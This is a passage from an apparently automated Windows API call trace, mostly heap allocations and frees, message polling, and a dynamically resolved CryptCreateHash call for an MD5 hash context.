wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0165.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0165.490] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0165.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0165.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0165.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0165.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0165.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0165.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0165.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0165.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0165.491] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c98 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0165.491] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0165.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0165.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0165.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0165.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0165.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0165.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0165.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0165.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0165.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0165.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0165.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0165.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0165.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0165.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0165.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0165.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0165.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0165.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0165.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50aa0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0165.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0165.494] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0165.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0165.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0165.495] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0165.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0165.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0165.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0165.496] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e88 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0165.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0165.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ea8 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0165.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0165.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54df8 [0165.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0165.497] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0165.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0165.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0165.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0165.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0165.499] RtlAllocateHeap 